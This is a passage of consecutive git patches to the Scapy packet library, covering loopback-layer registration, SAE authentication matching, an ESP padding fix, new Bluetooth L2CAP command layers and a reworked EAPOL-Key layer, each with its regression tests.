TestFuzzNBytesField(Packet): f = fuzz(TestFuzzNBytesField()) assert f.test1.max == 2 ** (128 * 8) - 1 +p2 = TestNBytesField(raw(p)) +assert p2.sprintf('%test1% %test2% %test3% %test4%') == '18838586676582 0xc000ff3333 0xffeeddccbbaa9988776655 309404098707666285700277845' +assert p2.test1 == 18838586676582 +assert p2.test2 == 0xc000ff3333 +assert p2.test3 == 0xffeeddccbbaa9988776655 +assert p2.test4 == 309404098707666285700277845 +assert raw(p2) == raw(TestNBytesField(test1=p2.test1, test2=p2.test2, test3=p2.test3, test4=p2.test4)) + = StrField ~ field strfield ~ field strlenfield diff --git a/test/scapy/layers/bluetooth.uts b/test/scapy/layers/bluetooth.uts index 539a3d97ffd..2774795817b 100644 --- a/test/scapy/layers/bluetooth.uts +++ b/test/scapy/layers/bluetooth.uts @@ -178,7 +178,7 @@ assert cmd[HCI_Cmd_Authentication_Requested].handle == 256 cmd = HCI_Hdr(hex_bytes("010b041676d56f9501006c9016a48a009180086a39200f03d3dd")) assert HCI_Cmd_Link_Key_Request_Reply in cmd assert cmd[HCI_Cmd_Link_Key_Request_Reply].bd_addr == "00:01:95:6f:d5:76" -assert cmd[HCI_Cmd_Link_Key_Request_Reply].link_key == 294855023751241435024024030130491265132 +assert cmd[HCI_Cmd_Link_Key_Request_Reply].link_key == 0x6c9016a48a009180086a39200f03d3dd = Set Connection Encryption From 1eaa24f855aa00f4957310a900c1cc91ac5af067 Mon Sep 17 00:00:00 2001 From: Guillaume Valadon Date: Tue, 6 Dec 2022 20:32:52 +0100 Subject: [PATCH 1168/1632] Fix Loopback Layer: support DLT_LOOP on all plateforms --- scapy/layers/l2.py | 25 ++++++++++++++++++------- test/regression.uts | 9 +++++++++ 2 files changed, 27 insertions(+), 7 deletions(-) diff --git a/scapy/layers/l2.py b/scapy/layers/l2.py index 07c8c0c652a..c2f6b780a61 100644 --- a/scapy/layers/l2.py +++ b/scapy/layers/l2.py @@ -20,8 +20,7 @@ from scapy import consts from scapy.data import ARPHDR_ETHER, ARPHDR_LOOPBACK, ARPHDR_METRICOM, \ DLT_ETHERNET_MPACKET, DLT_LINUX_IRDA, DLT_LINUX_SLL, DLT_LINUX_SLL2, \ - DLT_LOOP, DLT_NULL, ETHER_ANY, ETHER_BROADCAST, ETHER_TYPES, ETH_P_ARP, \ - ETH_P_MACSEC + DLT_LOOP, DLT_NULL, ETHER_ANY, ETHER_BROADCAST, ETHER_TYPES, ETH_P_ARP, ETH_P_MACSEC from scapy.error import warning, ScapyNoDstMacException, log_runtime from scapy.fields import ( BCDFloatField, @@ -689,15 +688,27 @@ def i2m(self, pkt, x): 0x18: "IPv6", 0x1c: "IPv6", 0x1e: "IPv6"} -class Loopback(Packet): - r"""\*BSD loopback layer""" +# On OpenBSD, Loopback = LoopbackOpenBSD. On other platforms, the 2 are available. +# This is to be compatible with both tcpdump and tshark +class Loopback(Packet): + r""" + \*BSD loopback layer + """ + __slots__ = ["_defrag_pos"] name = "Loopback" if consts.OPENBSD: fields_desc = [IntEnumField("type", 0x2, LOOPBACK_TYPES)] else: fields_desc = [LoIntEnumField("type", 0x2, LOOPBACK_TYPES)] - __slots__ = ["_defrag_pos"] + + +if consts.OPENBSD: + LoopbackOpenBSD = Loopback +else: + class LoopbackOpenBSD(Loopback): + name = "OpenBSD Loopback" + fields_desc = [IntEnumField("type", 0x2, LOOPBACK_TYPES)] class Dot1AD(Dot1Q): @@ -775,8 +786,8 @@ def mysummary(self): conf.l2types.register(DLT_LINUX_SLL2, CookedLinuxV2) conf.l2types.register(DLT_ETHERNET_MPACKET, MPacketPreamble) conf.l2types.register_num2layer(DLT_LINUX_IRDA, CookedLinux) -conf.l2types.register(DLT_LOOP, Loopback) -conf.l2types.register_num2layer(DLT_NULL, Loopback) +conf.l2types.register(DLT_NULL, Loopback) +conf.l2types.register(DLT_LOOP, LoopbackOpenBSD) conf.l3types.register(ETH_P_ARP, ARP) diff --git a/test/regression.uts b/test/regression.uts index b52aad92800..5b9f41c8486 100644 --- a/test/regression.uts +++ b/test/regression.uts @@ -2669,6 +2669,15 @@ with mock.patch("scapy.utils.warning") as warning: os.remove(filename) assert any("Inconsistent" in arg for arg in warning.call_args[0]) += Check wrpcap() with the Loopback layer +~ tshark + +for cls in [Loopback, LoopbackOpenBSD]: + filename = tempfile.mktemp(suffix=".pcap") + wrpcap(filename, [cls()/IP()/ICMP()]) + return_value = b"".join(line for line in tcpdump(filename, prog=conf.prog.tshark, getfd=True)) + assert b"Echo (ping) request" in return_value + ############ ############ + ERF Ethernet format support From 2736d43d86c98358fd937c6fdc7eccba36e23827 Mon Sep 17 00:00:00 2001 From: rdhammond15 Date: Wed, 13 Dec 2023 07:30:06 -0500 Subject: [PATCH 1169/1632] Correct misleading documentation Update the comment for the `iface` argument for the AsyncSniffer class as it was incorrect. --- scapy/sendrecv.py | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/scapy/sendrecv.py b/scapy/sendrecv.py index 1c551312120..051247a7979 100644 --- a/scapy/sendrecv.py +++ b/scapy/sendrecv.py @@ -1029,7 +1029,7 @@ class AsyncSniffer(object): we have to stop the capture after this packet. --Ex: stop_filter = lambda x: x.haslayer(TCP) iface: interface or list of interfaces (default: None for sniffing - on all interfaces). + on the default interface). monitor: use monitor mode. May not be available on all OS started_callback: called as soon as the sniffer starts sniffing (default: None). From 9857163fa2fab532b1842520824274c05ef8beaf Mon Sep 17 00:00:00 2001 From: ProofNetPopperl <128710145+ProofNetPopperl@users.noreply.github.com> Date: Thu, 23 Mar 2023 15:10:44 +0100 Subject: [PATCH 1170/1632] Fix SRP not detecting valid SAE auth responses (#3951) --- scapy/layers/dot11.py | 8 +++++++- test/scapy/layers/dot11.uts | 16 ++++++++++++++++ 2 files changed, 23 insertions(+), 1 deletion(-) diff --git a/scapy/layers/dot11.py b/scapy/layers/dot11.py index 84e25b84b84..f2d7326b357 100644 --- a/scapy/layers/dot11.py +++ b/scapy/layers/dot11.py @@ -1573,7 +1573,13 @@ class Dot11Auth(_Dot11EltUtils): LEShortEnumField("status", 0, status_code)] def answers(self, other): - if self.seqnum == other.seqnum + 1: + if self.algo != other.algo: + return 0 + + if ( + self.seqnum == other.seqnum + 1 or + (self.algo == 3 and self.seqnum == other.seqnum) + ): return 1 return 0 diff --git a/test/scapy/layers/dot11.uts b/test/scapy/layers/dot11.uts index e967cfbd338..944df86d370 100644 --- a/test/scapy/layers/dot11.uts +++ b/test/scapy/layers/dot11.uts @@ -136,6 +136,22 @@ assert not a.answers(b) assert not (Dot11()/Dot11Ack()).answers(Dot11()) assert (Dot11()/LLC(dsap=2, ctrl=4)).answers(Dot11()/LLC(dsap=1, ctrl=5)) +# SAE +a = Dot11()/Dot11Auth(algo=3, seqnum=1) # non-AP STA --> AP STA COMMIT +b = Dot11()/Dot11Auth(algo=3, seqnum=1) # AP STA --> non-AP STA COMMIT +c = Dot11()/Dot11Auth(algo=3, seqnum=2) # non-AP STA --> AP STA CONFIRM +d = Dot11()/Dot11Auth(algo=3, seqnum=2) # AP STA --> non-AP STA CONFIRM +e = Dot11()/Dot11Auth(algo=0, seqnum=1) + +assert b.answers(a) +assert c.answers(b) +assert d.answers(c) + +assert not a.answers(e) +assert not c.answers(e) +assert not e.answers(a) +assert not e.answers(c) + = Dot11Beacon network_stats() data = b'\x00\x00\x12\x00.H\x00\x00\x00\x02\x8f\t\xa0\x00\x01\x01\x00\x00\x80\x00\x00\x00\xff\xff\xff\xff\xff\xffDH\xc1\xb7\xf0uDH\xc1\xb7\xf0u\x10\xb7\x00\x00\x00\x00\x00\x00\x00\x00\x90\x01\x11\x00\x00\x06SSID76\x01\n\x82\x84\x0c\x12\x18$0H`l\x03\x01\x080\x18\x01\x00\x00\x0f\xac\x04\x02\x00\x00\x0f\xac\x04\x00\x0f\xac\x02\x01\x00\x00\x0f\xac\x02\x0c\x00\x07\tUSI\x01\x18\x00\n\x05\xe7' From 03bb7058baf5da163cb115887f075b6b0283cd6a Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Pawe=C5=82=20Pachocki?= <101826859+ppachocki@users.noreply.github.com> Date: Fri, 15 Sep 2023 12:41:59 +0200 Subject: [PATCH 1171/1632] Fixed ESP padding in decryption --- scapy/layers/ipsec.py | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/scapy/layers/ipsec.py b/scapy/layers/ipsec.py index fbf3b173862..57d180b71c2 100644 --- a/scapy/layers/ipsec.py +++ b/scapy/layers/ipsec.py @@ -492,8 +492,8 @@ def decrypt(self, sa, esp, key, icv_size=None, esn_en=False, esn=0): nh = orb(data[-1]) # then use padlen to determine data and padding - data = data[:len(data) - padlen - 2] padding = data[len(data) - padlen - 2: len(data) - 2] + data = data[:len(data) - padlen - 2] return _ESPPlain(spi=esp.spi, seq=esp.seq, From 280d5969be5dd3562ecb1fa7b7d475d55aade60f Mon Sep 17 00:00:00 2001 From: haramel Date: Mon, 7 Jun 2021 03:54:56 -0700 Subject: [PATCH 1172/1632] Bluetooth: Add more L2CAP commands --- scapy/layers/bluetooth.py | 226 +++++++++++++++++++++++++++++++- test/scapy/layers/bluetooth.uts | 40 +++--- 2 files changed, 240 insertions(+), 26 deletions(-) diff --git a/scapy/layers/bluetooth.py b/scapy/layers/bluetooth.py index 75b3b05ba79..6c5656b23fc 100644 --- a/scapy/layers/bluetooth.py +++ b/scapy/layers/bluetooth.py @@ -4,6 +4,7 @@ # Copyright (C) Philippe Biondi # Copyright (C) Mike Ryan # Copyright (C) Michael Farrell +# Copyright (C) Haram Park """ Bluetooth layers, sockets and send/receive functions. @@ -250,11 +251,32 @@ def post_build(self, p, pay): class L2CAP_CmdHdr(Packet): name = "L2CAP command header" fields_desc = [ - ByteEnumField("code", 8, {1: "rej", 2: "conn_req", 3: "conn_resp", - 4: "conf_req", 5: "conf_resp", 6: "disconn_req", # noqa: E501 - 7: "disconn_resp", 8: "echo_req", 9: "echo_resp", # noqa: E501 - 10: "info_req", 11: "info_resp", 18: "conn_param_update_req", # noqa: E501 - 19: "conn_param_update_resp"}), + ByteEnumField("code", 8, {1: "rej", + 2: "conn_req", + 3: "conn_resp", + 4: "conf_req", + 5: "conf_resp", + 6: "disconn_req", + 7: "disconn_resp", + 8: "echo_req", + 9: "echo_resp", + 10: "info_req", + 11: "info_resp", + 12: "create_channel_req", + 13: "create_channel_resp", + 14: "move_channel_req", + 15: "move_channel_resp", + 16: "move_channel_confirm_req", + 17: "move_channel_confirm_resp", + 18: "conn_param_update_req", + 19: "conn_param_update_resp", + 20: "LE_credit_based_conn_req", + 21: "LE_credit_based_conn_resp", + 22: "flow_control_credit_ind", + 23: "credit_based_conn_req", + 24: "credit_based_conn_resp", + 25: "credit_based_reconf_req", + 26: "credit_based_reconf_resp"}), ByteField("id", 0), LEShortField("len", None)] @@ -277,7 +299,22 @@ def answers(self, other): class L2CAP_ConnReq(Packet): name = "L2CAP Conn Req" - fields_desc = [LEShortEnumField("psm", 0, {1: "SDP", 3: "RFCOMM", 5: "telephony control"}), # noqa: E501 + fields_desc = [LEShortEnumField("psm", 0, {1: "SDP", + 3: "RFCOMM", + 5: "TCS-BIN", + 7: "TCS-BIN-CORDLESS", + 15: "BNEP", + 17: "HID-Control", + 19: "HID-Interrupt", + 21: "UPnP", + 23: "AVCTP-Control", + 25: "AVDTP", + 27: "AVCTP-Browsing", + 29: "UDI_C-Plane", + 31: "ATT", + 33: "3DSP", + 35: "IPSP", + 37: "OTS"}), LEShortField("scid", 0), ] @@ -335,6 +372,16 @@ def answers(self, other): return self.scid == other.scid +class L2CAP_EchoReq(Packet): + name = "L2CAP Echo Req" + fields_desc = [StrField("data", ""), ] + + +class L2CAP_EchoResp(Packet): + name = "L2CAP Echo Resp" + fields_desc = [StrField("data", ""), ] + + class L2CAP_InfoReq(Packet): name = "L2CAP Info Req" fields_desc = [LEShortEnumField("type", 0, {1: "CL_MTU", 2: "FEAT_MASK"}), @@ -352,6 +399,78 @@ def answers(self, other): return self.type == other.type +class L2CAP_Create_Channel_Request(Packet): + name = "L2CAP Create Channel Request" + fields_desc = [LEShortEnumField("psm", 0, {1: "SDP", + 3: "RFCOMM", + 5: "TCS-BIN", + 7: "TCS-BIN-CORDLESS", + 15: "BNEP", + 17: "HID-Control", + 19: "HID-Interrupt", + 21: "UPnP", + 23: "AVCTP-Control", + 25: "AVDTP", + 27: "AVCTP-Browsing", + 29: "UDI_C-Plane", + 31: "ATT", + 33: "3DSP", + 35: "IPSP", + 37: "OTS"}), + LEShortField("scid", 0), + ByteField("controller_id", 0), ] + + +class L2CAP_Create_Channel_Response(Packet): + name = "L2CAP Create Channel Response" + fields_desc = [LEShortField("dcid", 0), + LEShortField("scid", 0), + LEShortEnumField("result", 0, { + 0: "Connection successful", + 1: "Connection pending", + 2: "Connection refused - PSM not supported", + 3: "Connection refused - security block", + 4: "Connection refused - no resources available", + 5: "Connection refused - cont_ID not supported", + 6: "Connection refused - invalid scid", + 7: "Connection refused - scid already allocated"}), + LEShortEnumField("status", 0, { + 0: "No further information available", + 1: "Authentication pending", + 2: "Authorization pending"}), ] + + +class L2CAP_Move_Channel_Request(Packet): + name = "L2CAP Move Channel Request" + fields_desc = [LEShortField("icid", 0), + ByteField("dest_controller_id", 0), ] + + +class L2CAP_Move_Channel_Response(Packet): + name = "L2CAP Move Channel Response" + fields_desc = [LEShortField("icid", 0), + LEShortEnumField("result", 0, { + 0: "Move success", + 1: "Move pending", + 2: "Move refused - Cont_ID not supported", + 3: "Move refused - Cont_ID is same as old one", + 4: "Move refused - Configuration not supported", + 5: "Move refused - Move channel collision", + 6: "Move refused - Not allowed to be moved"}), ] + + +class L2CAP_Move_Channel_Confirmation_Request(Packet): + name = "L2CAP Move Channel Confirmation Request" + fields_desc = [LEShortField("icid", 0), + LEShortEnumField("result", 0, {0: "Move success", + 1: "Move failure"}), ] + + +class L2CAP_Move_Channel_Confirmation_Response(Packet): + name = "L2CAP Move Channel Confirmation Response" + fields_desc = [LEShortField("icid", 0), ] + + class L2CAP_Connection_Parameter_Update_Request(Packet): name = "L2CAP Connection Parameter Update Request" fields_desc = [LEShortField("min_interval", 0), @@ -365,6 +484,86 @@ class L2CAP_Connection_Parameter_Update_Response(Packet): fields_desc = [LEShortField("move_result", 0), ] +class L2CAP_LE_Credit_Based_Connection_Request(Packet): + name = "L2CAP LE Credit Based Connection Request" + fields_desc = [LEShortField("spsm", 0), + LEShortField("scid", 0), + LEShortField("mtu", 0), + LEShortField("mps", 0), + LEShortField("initial_credits", 0), ] + + +class L2CAP_LE_Credit_Based_Connection_Response(Packet): + name = "L2CAP LE Credit Based Connection Response" + fields_desc = [LEShortField("dcid", 0), + LEShortField("mtu", 0), + LEShortField("mps", 0), + LEShortField("initial_credits", 0), + LEShortEnumField("result", 0, { + 0: "Connection successful", + 2: "Connection refused - SPSM not supported", + 4: "Connection refused - no resources available", + 5: "Connection refused - authentication error", + 6: "Connection refused - authorization error", + 7: "Connection refused - encrypt_key size error", + 8: "Connection refused - insufficient encryption", + 9: "Connection refused - invalid scid", + 10: "Connection refused - scid already allocated", + 11: "Connection refused - parameters error"}), ] + + +class L2CAP_Flow_Control_Credit_Ind(Packet): + name = "L2CAP Flow Control Credit Ind" + fields_desc = [LEShortField("cid", 0), + LEShortField("credits", 0), ] + + +class L2CAP_Credit_Based_Connection_Request(Packet): + name = "L2CAP Credit Based Connection Request" + fields_desc = [LEShortField("spsm", 0), + LEShortField("mtu", 0), + LEShortField("mps", 0), + LEShortField("initial_credits", 0), + LEShortField("scid", 0), ] + + +class L2CAP_Credit_Based_Connection_Response(Packet): + name = "L2CAP Credit Based Connection Response" + fields_desc = [LEShortField("mtu", 0), + LEShortField("mps", 0), + LEShortField("initial_credits", 0), + LEShortEnumField("result", 0, { + 0: "All connection successful", + 2: "All connection refused - SPSM not supported", + 4: "Some connections refused - resources error", + 5: "All connection refused - authentication error", + 6: "All connection refused - authorization error", + 7: "All connection refused - encrypt_key size error", + 8: "All connection refused - encryption error", + 9: "Some connection refused - invalid scid", + 10: "Some connection refused - scid already allocated", + 11: "All Connection refused - unacceptable parameters", + 12: "All connections refused - invalid parameters"}), + LEShortField("dcid", 0), ] + + +class L2CAP_Credit_Based_Reconfigure_Request(Packet): + name = "L2CAP Credit Based Reconfigure Request" + fields_desc = [LEShortField("mtu", 0), + LEShortField("mps", 0), + LEShortField("dcid", 0), ] + + +class L2CAP_Credit_Based_Reconfigure_Response(Packet): + name = "L2CAP Credit Based Reconfigure Response" + fields_desc = [LEShortEnumField("result", 0, { + 0: "Reconfig successful", + 1: "Reconfig failed - MTU size reduction not allowed", + 2: "Reconfig failed - MPS size reduction not allowed", + 3: "Reconfig failed - one or more dcids invalid", + 4: "Reconfig failed - unacceptable parameters"}), ] + + class ATT_Hdr(Packet): name = "ATT header" fields_desc = [XByteField("opcode", None), ] @@ -1823,10 +2022,25 @@ class HCI_LE_Meta_Long_Term_Key_Request(Packet): bind_layers(L2CAP_CmdHdr, L2CAP_ConfResp, code=5) bind_layers(L2CAP_CmdHdr, L2CAP_DisconnReq, code=6) bind_layers(L2CAP_CmdHdr, L2CAP_DisconnResp, code=7) +bind_layers(L2CAP_CmdHdr, L2CAP_EchoReq, code=8) +bind_layers(L2CAP_CmdHdr, L2CAP_EchoResp, code=9) bind_layers(L2CAP_CmdHdr, L2CAP_InfoReq, code=10) bind_layers(L2CAP_CmdHdr, L2CAP_InfoResp, code=11) +bind_layers(L2CAP_CmdHdr, L2CAP_Create_Channel_Request, code=12) +bind_layers(L2CAP_CmdHdr, L2CAP_Create_Channel_Response, code=13) +bind_layers(L2CAP_CmdHdr, L2CAP_Move_Channel_Request, code=14) +bind_layers(L2CAP_CmdHdr, L2CAP_Move_Channel_Response, code=15) +bind_layers(L2CAP_CmdHdr, L2CAP_Move_Channel_Confirmation_Request, code=16) +bind_layers(L2CAP_CmdHdr, L2CAP_Move_Channel_Confirmation_Response, code=17) bind_layers(L2CAP_CmdHdr, L2CAP_Connection_Parameter_Update_Request, code=18) bind_layers(L2CAP_CmdHdr, L2CAP_Connection_Parameter_Update_Response, code=19) +bind_layers(L2CAP_CmdHdr, L2CAP_LE_Credit_Based_Connection_Request, code=20) +bind_layers(L2CAP_CmdHdr, L2CAP_LE_Credit_Based_Connection_Response, code=21) +bind_layers(L2CAP_CmdHdr, L2CAP_Flow_Control_Credit_Ind, code=22) +bind_layers(L2CAP_CmdHdr, L2CAP_Credit_Based_Connection_Request, code=23) +bind_layers(L2CAP_CmdHdr, L2CAP_Credit_Based_Connection_Response, code=24) +bind_layers(L2CAP_CmdHdr, L2CAP_Credit_Based_Reconfigure_Request, code=25) +bind_layers(L2CAP_CmdHdr, L2CAP_Credit_Based_Reconfigure_Response, code=26) bind_layers(L2CAP_Hdr, ATT_Hdr, cid=4) bind_layers(ATT_Hdr, ATT_Error_Response, opcode=0x1) bind_layers(ATT_Hdr, ATT_Exchange_MTU_Request, opcode=0x2) diff --git a/test/scapy/layers/bluetooth.uts b/test/scapy/layers/bluetooth.uts index 2774795817b..bcb207f031b 100644 --- a/test/scapy/layers/bluetooth.uts +++ b/test/scapy/layers/bluetooth.uts @@ -145,6 +145,7 @@ assert hci_cmd_le_read_buffer_size_v1.ocf == 0x02 assert hci_cmd_le_read_buffer_size_v1.len == 0 + Bluetooth Transport Layers + = Test HCI_PHDR_Hdr pkt = HCI_PHDR_Hdr()/HCI_Hdr()/HCI_ACL_Hdr()/L2CAP_Hdr()/L2CAP_CmdHdr()/L2CAP_InfoReq() @@ -379,7 +380,7 @@ assert a[SM_Identity_Address_Information].atype == 0 a.show() = Basic HCI_ACL_Hdr build & dissect -a = HCI_Hdr()/HCI_ACL_Hdr(handle=0xf4c, PB=2, BC=2, len=20)/L2CAP_Hdr(len=16)/L2CAP_CmdHdr(code=8, len=12)/Raw("A"*12) +a = HCI_Hdr()/HCI_ACL_Hdr(handle=0xf4c, PB=2, BC=2, len=20)/L2CAP_Hdr(len=16)/L2CAP_CmdHdr(code=8, len=12)/L2CAP_EchoReq(data="AAAAAAAAAAAA") assert raw(a) == b'\x02L\xaf\x14\x00\x10\x00\x05\x00\x08\x00\x0c\x00AAAAAAAAAAAA' b = HCI_Hdr(raw(a)) assert a == b @@ -394,7 +395,24 @@ a = HCI_Hdr(b'\x02\x00\x00\x11\x00\r\x00\x05\x00\x0b\x00\t\x00\x01\x00\x00\x00de assert a[L2CAP_InfoResp].result == 0 assert a[L2CAP_InfoResp].data == b"debug" -= Answers += HCI - L2CAP Echo test + +rq = HCI_Hdr()/HCI_ACL_Hdr()/L2CAP_Hdr()/L2CAP_CmdHdr()/L2CAP_EchoReq(data=b"data") +assert bytes(rq) == b'\x02\x00\x00\x0c\x00\x08\x00\x05\x00\x08\x00\x04\x00data' + +rsp = HCI_Hdr()/HCI_ACL_Hdr()/L2CAP_Hdr()/L2CAP_CmdHdr()/L2CAP_EchoResp(data=b"data") +assert bytes(rsp) == b'\x02\x00\x00\x0c\x00\x08\x00\x05\x00\t\x00\x04\x00data' +assert rsp.answers(rq) + += HCI - L2CAP Create Channel request + +p = HCI_Hdr()/HCI_ACL_Hdr()/L2CAP_Hdr()/L2CAP_CmdHdr()/L2CAP_Create_Channel_Request(psm="SDP") +assert bytes(p) == b'\x02\x00\x00\r\x00\t\x00\x05\x00\x0c\x00\x05\x00\x01\x00\x00\x00\x00' + +p = HCI_Hdr(bytes(p)) +assert p[L2CAP_Create_Channel_Request].psm == 1 + += L2CAP Conn Answers a = HCI_Hdr(b'\x02\x00\x00\x0c\x00\x08\x00\x05\x00\x02\x00\x04\x00\x00\x00\x9a;') b = HCI_Hdr(b'\x02\x00\x00\x10\x00\x0c\x00\x05\x00\x03\x00\x08\x00\xff\xff\x9a;\x00\x00\x01\x00') assert b.answers(a) @@ -494,24 +512,6 @@ pkt.handles[0].value == b'\x02\x03\x00\x00*' pkt.handles[1].value == b'\x02\x05\x00\x01*' pkt.handles[2].value == b'\x02\x07\x00\x04*' -= L2CAP layers - -# a crazy packet with all classes in it! -pkt = L2CAP_CmdHdr()/L2CAP_CmdRej()/L2CAP_ConfReq()/L2CAP_ConfResp()/L2CAP_ConnReq()/L2CAP_ConnResp()/L2CAP_Connection_Parameter_Update_Request()/L2CAP_Connection_Parameter_Update_Response()/L2CAP_DisconnReq()/L2CAP_DisconnResp()/L2CAP_Hdr()/L2CAP_InfoReq()/L2CAP_InfoResp() -assert L2CAP_CmdHdr in pkt.layers() -assert L2CAP_CmdRej in pkt.layers() -assert L2CAP_ConfReq in pkt.layers() -assert L2CAP_ConfResp in pkt.layers() -assert L2CAP_ConnReq in pkt.layers() -assert L2CAP_ConnResp in pkt.layers() -assert L2CAP_Connection_Parameter_Update_Request in pkt.layers() -assert L2CAP_Connection_Parameter_Update_Response in pkt.layers() -assert L2CAP_DisconnReq in pkt.layers() -assert L2CAP_DisconnResp in pkt.layers() -assert L2CAP_Hdr in pkt.layers() -assert L2CAP_InfoReq in pkt.layers() -assert L2CAP_InfoResp in pkt.layers() - = SM_Public_Key() tests r = raw(SM_Hdr()/SM_Public_Key(key_x="sca", key_y="py")) From 6d785f98cbe25dad21834a7074d48958bd5cc5e6 Mon Sep 17 00:00:00 2001 From: TheMadProphet Date: Fri, 10 Jun 2022 13:28:16 +0400 Subject: [PATCH 1173/1632] Merge tests and tweaks with existing EAPOL_KEY class Added EAPOL-Key layer according to IEEE 802.11-2016 standard. Layer includes helper function for guessing 4-way handshake key number. --- scapy/layers/eap.py | 32 ++++++++++++--- test/scapy/layers/eap.uts | 84 +++++++++++++++++++++++++++++++++++++-- 2 files changed, 108 insertions(+), 8 deletions(-) diff --git a/scapy/layers/eap.py b/scapy/layers/eap.py index 212b07a3bdc..4f0d7cda53c 100644 --- a/scapy/layers/eap.py +++ b/scapy/layers/eap.py @@ -438,6 +438,10 @@ class LEAP(EAP): class EAPOL_KEY(Packet): name = "EAPOL_KEY" + deprecated_fields = { + "key": ("key_data", "2.6.0"), + "len": ("key_length", "2.6.0"), + } fields_desc = [ ByteEnumField("key_descriptor_type", 1, {1: "RC4", 2: "RSN"}), # Key Information @@ -458,20 +462,20 @@ class EAPOL_KEY(Packet): 3: "AES-128-CMAC+AES-128", }), # - LenField("len", None, "H"), + LenField("key_length", None, "H"), LongField("key_replay_counter", 0), XStrFixedLenField("key_nonce", "", 32), XStrFixedLenField("key_iv", "", 16), XStrFixedLenField("key_rsc", "", 8), XStrFixedLenField("key_id", "", 8), XStrFixedLenField("key_mic", "", 16), # XXX size can be 24 - LenField("key_length", None, "H"), - XStrLenField("key", "", - length_from=lambda pkt: pkt.key_length) + FieldLenField("key_data_length", None, length_of="key_data"), + XStrLenField("key_data", "", + length_from=lambda pkt: pkt.key_data_length) ] def extract_padding(self, s): - return s[:self.len], s[self.len:] + return s[:self.key_length], s[self.key_length:] def hashret(self): return struct.pack("!B", self.type) + self.payload.hashret() @@ -482,6 +486,24 @@ def answers(self, other): return 1 return 0 + def guess_key_number(self): + """ + Determines 4-way handshake key number + + :return: key number (1-4), or 0 if it cannot be determined + """ + if self.key_type == 1: + if self.key_ack == 1: + if self.key_mic == 0: + return 1 + if self.install == 1: + return 3 + else: + if self.secure == 0: + return 2 + return 4 + return 0 + ############################################################################# # IEEE 802.1X-2010 - MACsec Key Agreement (MKA) protocol diff --git a/test/scapy/layers/eap.uts b/test/scapy/layers/eap.uts index 4f0eeaa2b05..3a251cca897 100644 --- a/test/scapy/layers/eap.uts +++ b/test/scapy/layers/eap.uts @@ -65,9 +65,87 @@ assert wifi[EAPOL].key_ack == 1 assert wifi[EAPOL].key_type == 1 assert wifi[EAPOL].key_descriptor_type_version == 2 assert wifi[EAPOL].key_replay_counter == 4 -assert wifi[EAPOL].key_mic == b"\x00" * 16 -assert wifi[EAPOL].key_length == 22 -assert len(wifi[EAPOL].key) == 22 +assert wifi[EAPOL].has_key_mic == 0 +assert wifi[EAPOL].key_data_length == 22 +assert len(wifi[EAPOL].key_data) == 22 + += EAPOL-Key - Key 1 - Dissection (1) +s = b'\x02\x03\x00\x75\x02\x00\x8a\x00\x10\x00\x00\x00\x00\x00\x00\x00\x00\x12\x6a\xce\x64\xc1\xa6\x44\xd2\x7b\x84\xe0\x39\x26\x3b\x63\x3b\xc3\x74\xe3\x29\x9d\x7d\x45\xe1\xc4\x25\x44\x05\x48\x05\xbf\xe5\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x16\xdd\x14\x00\x0f\xac\x04\x05\xb1\xb6\x8b\x5a\x91\xfc\x04\x06\x83\x84\x06\xe8\xd1\x5f\xdb' +eapol = EAPOL(s) +assert(eapol.version == 2) +assert(eapol.type == 3) +assert(eapol.len == 117) +assert(eapol.haslayer(EAPOL_KEY)) +eapol_key = eapol[EAPOL_KEY] +assert(eapol_key.key_descriptor_type == 2) +assert(eapol_key.key_descriptor_type_version == 2) +assert(eapol_key.key_type == 1) +assert(eapol_key.key_length == 16) +assert(eapol_key.install == 0) +assert(eapol_key.key_ack == 1) +assert(eapol_key.key_mic == b"\x00" * 16) +assert(eapol_key.secure == 0) +assert(eapol_key.key_data_length == 22) +assert(eapol_key.guess_key_number() == 0) + += EAPOL_KEY - Key 2 - Dissection (2) +s = b'\x02\x03\x00\x75\x02\x01\x0a\x00\x10\x00\x00\x00\x00\x00\x00\x00\x00\x60\x5e\x85\xa7\x9c\xfa\xfd\xb0\xea\xa0\x50\x68\x3f\x97\xbe\x1b\x66\xde\xf7\xbc\x65\x20\x57\x31\x68\x71\xc2\x73\xc5\xae\x47\x7f\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x91\x89\xcd\xf1\x88\x54\x8e\x73\xcd\x37\xd5\x78\x52\x66\x05\x88\x00\x16\x30\x14\x01\x00\x00\x0f\xac\x04\x01\x00\x00\x0f\xac\x04\x01\x00\x00\x0f\xac\x02\x28\x00' +eapol = EAPOL(s) +assert(eapol.version == 2) +assert(eapol.type == 3) +assert(eapol.len == 117) +assert(eapol.haslayer(EAPOL_KEY)) +eapol_key = eapol[EAPOL_KEY] +assert(eapol_key.key_descriptor_type == 2) +assert(eapol_key.key_descriptor_type_version == 2) +assert(eapol_key.key_type == 1) +assert(eapol_key.key_length == 16) +assert(eapol_key.install == 0) +assert(eapol_key.key_ack == 0) +assert(eapol_key.has_key_mic == 1) +assert(eapol_key.secure == 0) +assert(eapol_key.key_data_length == 22) +assert(eapol_key.guess_key_number() == 2) + += EAPOL_KEY - Key 3 - Dissection (3) +s = 